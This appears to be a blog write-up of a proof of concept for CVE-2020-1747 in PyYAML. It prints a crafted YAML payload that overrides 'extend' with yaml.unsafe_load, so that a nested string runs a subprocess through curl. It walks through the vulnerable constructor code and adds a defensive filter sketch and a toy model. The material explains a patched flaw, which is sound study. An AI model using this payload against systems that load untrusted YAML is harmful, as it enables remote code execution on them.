notes and writeups

CVE-2020-1747 PyYAML PoC

tl;dr: a ready-to-go script is available in my Gist.

Recently a vulnerability was discovered in Python’s PyYAML library that allowed arbitrary code execution through YAML deserialization. The original issue report and NVD’s vulnerability description cover the details of the case, so below I’ll just outline how to actually make it work.

The commits and tests linked in the GitHub issue show that the construct_python_object_apply function in FullConstructor (used by FullLoader) can set a “state” property on the object being created. This property is set from the input passed to FullLoader, and therefore from user input in the file being loaded. The “state” property can carry attributes, which can also be specified inside the loaded YAML file. The constructor, however, does not check whether the attributes supplied in this “state” are private class attributes, nor whether an attribute conflicts with the preexisting extend method. As a result, those attributes and methods can be overridden.
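The missing check can be pictured as a filter over the keys of the “state” mapping. The sketch below only illustrates that idea: UNSAFE_KEY and find_unsafe_state_keys are hypothetical names, and the pattern (any double-underscore attribute, plus extend) is an assumption based on the description above, not a copy of the PyYAML patch.

```python
import re

# Hypothetical pattern: double-underscore attributes and the extend method.
UNSAFE_KEY = re.compile(r"^extend$|^__.*__$")


def find_unsafe_state_keys(state):
    """Return the state keys that would shadow extend or a dunder attribute."""
    return [key for key in state if UNSAFE_KEY.match(key)]


# Same keys as a malicious "state" mapping; the value is just a placeholder string.
state = {"tag": "dummy", "value": "dummy", "extend": "yaml.unsafe_load"}
print(find_unsafe_state_keys(state))  # ['extend']
```

A loader that wanted to stay safe could refuse to construct the object whenever this list is non-empty.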

The example below shows a crafted YAML file that makes an HTTP request with curl.

- !!python/object/new:yaml.MappingNode
  listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", "127.0.0.1/rce"]]'
  state:
    tag: !!str dummy
    value: !!str dummy
    extend: !!python/name:yaml.unsafe_load

First we define the desired constructor, in this case PyYAML’s MappingNode, because the structure to be loaded is supposed to be a Python mapping (the other node types to choose from are “scalar” and “sequence”). Next, let’s look at the state property: the tag and value attributes are mandatory, so we just pass arbitrary values for them. Then the extend attribute is specified. Here is how the extend method is used in the FullConstructor code:

def construct_python_object_apply(self, suffix, node, newobj=False):
    # ...
    # some code omitted here
    #
    instance = self.make_python_instance(suffix, node, args, kwds, newobj)
    if state:
        self.set_python_instance_state(instance, state)
    if listitems:
        instance.extend(listitems)
    if dictitems:
        for key in dictitems:
            instance[key] = dictitems[key]
    return instance

We see that the extend method of some “instance” object is called. Because the “instance” has already had its “state” set from our input, its extend method is now overridden with the yaml.unsafe_load function. The extend method receives the listitems variable as input, which we also control. In our case it is another small piece of PyYAML-structured data, which imports and runs subprocess.Popen. The data is cast to a string so that it can later be passed to unsafe_load as-is. Otherwise PyYAML would try to make a Python object out of it.
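The override itself can be reproduced without PyYAML. The sketch below is a toy model, not PyYAML’s code: ToyNode, fake_loader, calls and toy_construct are made-up names, and copying the state onto the instance with __dict__.update is an assumption about how the state ends up as attributes. A harmless function stands in for yaml.unsafe_load.

```python
# Toy model of the override; none of these names come from PyYAML.

calls = []  # records what the stand-in loader receives


class ToyNode:
    """Stand-in for a class that defines its own extend method."""

    def extend(self, items):
        raise AssertionError("the original extend should never run here")


def fake_loader(data):
    """Harmless stand-in for yaml.unsafe_load: it only records its input."""
    calls.append(data)


def toy_construct(cls, state, listitems):
    """Follow the same order of steps as the excerpt above."""
    instance = cls.__new__(cls)
    if state:
        # Assumption: the state mapping is copied onto the instance as attributes.
        instance.__dict__.update(state)
    if listitems:
        # Attribute lookup finds the instance attribute before the class method.
        instance.extend(listitems)
    return instance


toy_construct(
    ToyNode,
    state={"tag": "dummy", "value": "dummy", "extend": fake_loader},
    listitems="nested payload string",
)
print(calls)  # ['nested payload string']
```

The point of the toy is the lookup order: a plain function stored on the instance shadows the method defined on the class, so the call to extend ends up in whatever callable the input supplied.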

This way we replaced the extend method with yaml.unsafe_load, which is known for its deserialization risks, and passed it a YAML payload nested inside the actual YAML file.

Thanks to ret2libc for discovering and reporting this problem. The vulnerability was fixed in PyYAML 5.3.1, which was made available on PyPI shortly after the issue was published, so thanks to the PyYAML team for that.